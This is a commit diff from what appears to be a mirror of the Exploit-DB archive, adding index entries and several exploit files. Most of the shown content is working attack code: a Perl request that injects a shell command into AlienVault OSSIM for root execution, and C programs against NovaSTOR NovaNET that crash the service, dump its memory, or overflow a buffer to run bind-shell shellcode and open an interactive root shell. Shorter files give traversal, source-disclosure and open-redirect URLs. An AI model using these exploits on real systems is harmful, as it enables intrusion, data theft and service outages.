bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_27_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-27 04:37:33 +00:00
parent c28dbf00b0
commit 768f1cee8f
14 changed files with 2169 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -30455,6 +30455,7 @@ id,file,description,date,author,platform,type,port
33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow Vulnerability",2010-03-25,"Luigi Auriemma",multiple,remote,0
33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
@ -30490,6 +30491,7 @@ id,file,description,date,author,platform,type,port
33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0
33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot - Remote Code Execution (0-day)",2014-06-24,@u0x,php,webapps,0
33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0
33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 'module' Parameter Cross Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0
@ -30502,3 +30504,14 @@ id,file,description,date,author,platform,type,port
33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0
33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0
33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection Vulnerabilities",2010-03-30,mat,php,webapps,0
33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0
33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 remote root exploit",2007-09-25,mu-b,multiple,remote,0
33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit",2007-09-25,mu-b,multiple,remote,0
33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0
33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0

Can't render this file because it is too large.

29
platforms/linux/remote/33805.pl Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: < 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805
#!perl -w
use SOAP::Lite;
# SSL is self-signed so we have to ignore verification.
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
# We simply append the 'id' command to the number of log we want to
# read.
@soap_response = SOAP::Lite
-> uri('AV/CC/Util')
-> proxy('https://172.26.22.2:40007/av-centerd')
-> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
-> result;
for (@{ $soap_response[0] }) {
print "$_\n";
}
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)

180
platforms/multiple/dos/33876.c Executable file
View file

@ -0,0 +1,180 @@
source: http://www.securityfocus.com/bid/39693/info
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
/* novanet-read.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NovaSTOR NovaNET remote DoS + arbitrary memory read
* by mu-b - Fri Sep 14 2007
*
* - Tested on: NovaSTOR NovaNET 11.0
*
* Note: this was silently fixed in NovaBACKUP NETWORK 13.0
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#define BUF_SIZE 0x92
#define NOVANET_INT_IDX 32
#define NOVANET_OFFSET 0x100EC480
#define NOVANET_CALC_INT(a) (((int) (a)-NOVANET_OFFSET-16)/sizeof (int))
#define NOVANET_SET_INT(a,b) *((unsigned int *) &a[NOVANET_INT_IDX]) = b;
#define NOVANET_TCP_PORT 3817
#define USLEEP_TIME 100000
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
perror ("send()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
return (recv (fd, dst, len, 0));
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("connect()");
return (-1);
}
return (fd);
}
static void
novanet_pkt_init (char *pkt)
{
char *ptr = pkt;
/* add packet header */
*ptr++ = 0x54;
*ptr++ = 0x84;
/* add padding */
memset (ptr, 0x00, 0x1E);
ptr += 0x1E;
/* add our dodgy-int */
memset (ptr, 0x69, sizeof (int));
ptr += sizeof (int);
memset (ptr, 0x00, BUF_SIZE-(ptr-pkt));
}
static void
novanet_read (char *host, void *start, void *end, int is_dos)
{
int sock, i, num_hits;
char buf[BUF_SIZE], rbuf[BUF_SIZE];
novanet_pkt_init (buf);
start = (void *) NOVANET_CALC_INT (start);
end = (void *) NOVANET_CALC_INT (end);
if (!is_dos)
printf ("start: %p end: %p\n", start, end);
num_hits = is_dos ? 1 : (end - start);
printf ("+hitting %s:%d. (%d times)\n", host, NOVANET_TCP_PORT, num_hits);
for (i = 0; i < num_hits; i++, start++)
{
sock = sockami (host, NOVANET_TCP_PORT);
if (sock == -1)
break;
NOVANET_SET_INT (buf, (is_dos ? NOVANET_CALC_INT (0xdeadbeef) : (unsigned int) start));
sock_send (sock, buf, sizeof buf);
if (!is_dos)
{
sock_recv (sock, rbuf, sizeof rbuf);
write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int));
usleep (USLEEP_TIME);
close (sock);
if (!((i + 1) % 8))
printf ("..%d", i + 1);
fflush (stdout);
}
}
printf ("\n");
}
int
main (int argc, char **argv)
{
void *start, *end;
printf ("NovaSTOR NovaNET remote DoS + arbitrary memory read\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if ((argc % 2) == 1 ||
(argc > 3 && (sscanf (argv[2], "0x%p", &start) != 1 ||
sscanf (argv[3], "0x%p", &end) != 1)))
{
fprintf (stderr, "Usage: %s <host> [[start] [end]]\n"
"Note: not specifying [[start] [end]] results in DoS!\n\n", argv[0]);
exit (EXIT_SUCCESS);
}
if (argc > 3)
printf ("dumping from: %p -> %p (%d-bytes) to stderr\n", start, end, (int) (end - start));
novanet_read (argv[1], start, end, !(argc > 3));
return (EXIT_SUCCESS);
}

191
platforms/multiple/dos/33879.c Executable file
View file

@ -0,0 +1,191 @@
source: http://www.securityfocus.com/bid/39693/info
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
/* novanet-dos.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS
* by mu-b - Tue Oct 2 2007
*
* - Tested on: NovaSTOR NovaNET 11.0(SP*)
* NovaSTOR NovaNET 12.0(SP*)
* NovaSTOR NovaNET 13.0
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#define NOVANET_HDR_SZ 0x14
#define NOVANET_PKT_SZ 0x92
#define NOVANET_MAX_LEN 0x112014
#define NOVANET_TCP_PORT 3817
#define USLEEP_TIME 100000
static char hdr_pkt[] =
"\x54\x84\x00\x00" /* 04 */
"\x00\x00\x00\x00" /* 08 */
"\x04\x00\x00\x00" /* 0C */
"\x92\x00\x00\x00" /* 10 */
"\x00\x00\x00\x00" /* 14 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 08 */ /* 1C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 10 */ /* 24 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 18 */ /* 2C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 20 */ /* 34 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 28 */ /* 3C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 30 */ /* 44 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 38 */ /* 4C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 40 */ /* 54 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 48 */ /* 5C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 50 */ /* 64 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 58 */ /* 6C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 60 */ /* 74 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 68 */ /* 7C */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 70 */ /* 84 */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 78 */ /* 8C */
"\x00\x00\x00\x00\x00\x00"; /* 7E */ /* 92 */
static char rem_pkt[] =
"\x51\x84\x00\x00" /* 04 */
"\x00\x00\x00\x30" /* 08 */
"\x05\x00\x00\x00" /* 0C */
"\x00\x00\x00\x00" /* 10 */
"\x00\x00\x00\x00"; /* 14 */
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
return (-1);
}
return (fd);
}
int
main (int argc, char **argv)
{
char rbuf_pkt[NOVANET_PKT_SZ];
unsigned int rlen;
int fd, n;
printf ("NovaSTOR NovaNET remote DoS\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
fd = sockami (argv[1], NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "main: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", argv[1], NOVANET_TCP_PORT);
printf ("** sending header packet...");
if ((n = sock_send (fd, hdr_pkt, sizeof hdr_pkt - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "main: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading first reply...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "main: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
srand (time (NULL));
rlen = NOVANET_MAX_LEN + (rand () % (UINT_MAX - NOVANET_MAX_LEN)) + 1;
*(unsigned int *) &rem_pkt[12] = rlen;
printf ("** sending smash packet [remaining length %u-bytes]...", rlen);
if ((n = sock_send (fd, rem_pkt, sizeof rem_pkt - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "main: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
usleep (USLEEP_TIME);
close (fd);
return (EXIT_SUCCESS);
}

13
platforms/multiple/remote/33868.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/39636/info
Apache ActiveMQ is prone to a vulnerability that lets attackers access source code because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer in the context of the webserver process. Information obtained may aid in further attacks.
Apache ActiveMQ 5.3.1 and prior are vulnerable.
NOTE: This vulnerability may be related to BID 27117 (Jetty Double Slash URI Information Disclosure Vulnerability).
http://www.example.com:8161//admin/index.jsp
http://www.example.com:8161//admin/queues.jsp
http://www.example.com:8161//admin/topics.jsp

10
platforms/multiple/remote/33871.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/39666/info
Tiny Java Web Server is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include a directory-traversal vulnerability, an open-redirection vulnerability, and a source code information-disclosure vulnerability.
Exploiting these issues can allow an attacker to retrieve arbitrary local files and view directories within the context of the webserver. Information harvested may aid in launching further attacks. A successful exploit may aid in phishing attacks; other attacks may also be possible.
Tiny Java Web Server 1.71 is vulnerable; other versions may also be affected.
get /%00 HTTP/1.1\r\nHost: digitalwhisper.co.il<http://digitalwhisper.co.il>\r\n\r\n
GET /demo-servlets/%2fWEB-INF/config/mishka.properties HTTP/1.1

7
platforms/multiple/remote/33873.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39676/info
HP System Management Homepage is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
http://www.example.com/red2301.html?RedirectUrl=evil () attacker com

386
platforms/multiple/remote/33877.c Executable file
View file

@ -0,0 +1,386 @@
source: http://www.securityfocus.com/bid/39693/info
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
/* novanet-own-lnx.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NovaSTOR NovaNET <= 12.0 remote root exploit
* by mu-b - Tue Sep 25 2007
*
* - Tested on: NovaSTOR NovaNET 11.0 (lnx)
*
* Note: this was silently fixed in NovaBACKUP NETWORK 13.0
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#define NOVANET_POPRET 0x8048eea /* pop %exx
* ret
*/
/* packet structure defines */
#define NOVANET_HDR_SZ 0x14
#define NOVANET_PKT_SZ 0x92
#define NOVANET_DOMAIN_SZ 0x1F
#define NOVANET_BUF_SZ 0x400
#define PORT_SHELL 10000
#define NOVANET_TCP_PORT 3817
#define USLEEP_TIME 100000
static char getdomain_buf[] =
"\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
"\xff\xff\xff\xff\x08\x40\x80\x00\x16\xaa\x11\x02\x4c\x84\xf4\x01"
"\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00" "digit-labs!$"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00" "Sup: Get Domain Address"
"\x00\x00\xff\xff\x00\x00\x06\x10";
static char ack_buf[] =
"\x51\x84\x00\x00\x00\x00\x00\x30"
"\x05\x00\x00\x00"
"\x18\x00\x00\x00" /* remaining length */
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";
static char hup_buf[] =
"\x56\x84\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x14\x00\x00\x00" /* remaining length */
"\x00\x00\x00\x00";
static char login_buf[] =
"\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
"\xff\xff\xff\xff\x09\x20\x80\x00\xcb\x14\x4C\x02\x41\xda\x2e\x02"
"\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69" "Dtb: Context"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x00\x00\x00\x00";
static char rem_buf[] =
"\x51\x84\x00\x00\x02\x02\x02\x32"
"\x18\x00\x00\x00"
"\x00\x00\x00\x00" /* remaining length */
"\x00\x00\x00\x00";
static char lnx_x86_bind[] =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12"
"\x76\xfc\x7d\x83\xeb\xfc\xe2\xf4\x23\xad\xaf\x3e\x41\x1c\xfe\x17"
"\x74\x2e\x65\xf4\xf3\xbb\x7c\xeb\x51\x24\x9a\x15\x35\x66\x9a\x2e"
"\x9b\x97\x96\x1b\x4a\x26\xad\x2b\x9b\x97\x31\xfd\xa2\x10\x2d\x9e"
"\xdf\xf6\xae\x2f\x44\x35\x75\x9c\xa2\x10\x31\xfd\x81\x1c\xfe\x24"
"\xa2\x49\x31\xfd\x5b\x0f\x05\xcd\x19\x24\x94\x52\x3d\x05\x94\x15"
"\x3d\x14\x95\x13\x9b\x95\xae\x2e\x9b\x97\x31\xfd";
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024], *cmd = "id; uname -a; uptime\n";
sock_send (fd, cmd, strlen (cmd));
while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);
if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
fprintf (stderr, "shellami: select() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "shellami: connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
rbuf[n] = '\0';
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '\0';
sock_send (fd, rbuf, n);
}
}
}
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
return (-1);
}
return (fd);
}
static void
novanet_get_domain (char *thost, char *d_name)
{
char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr;
int fd, n, rlen;
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_get_domain: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
printf ("** sending getdomain_buf packet...");
if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading first reply...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ);
printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name);
printf ("** sending ack packet...");
if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4)
{
fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ + 4);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading second reply...");
if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = *(unsigned int *) &rbuf_hdr[12];
if (rlen < NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n",
NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
rlen -= NOVANET_HDR_SZ;
printf ("** reading %d-remaining bytes...", rlen);
pkt_ptr = malloc (rlen * sizeof (char));
if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
printf ("done\n");
free (pkt_ptr);
printf ("** sending hup packet...");
if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
}
static void
novanet_own_process (char *thost, char *d_name)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int fd, n, rlen;
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x138 + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x134] = NOVANET_POPRET;
memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
int
main (int argc, char **argv)
{
char d_name[NOVANET_DOMAIN_SZ];
printf ("NovaSTOR NovaNET <= 12.0 remote root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
novanet_get_domain (argv[1], d_name);
novanet_own_process (argv[1], d_name);
return (EXIT_SUCCESS);
}

651
platforms/multiple/remote/33878.c Executable file
View file

@ -0,0 +1,651 @@
source: http://www.securityfocus.com/bid/39693/info
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
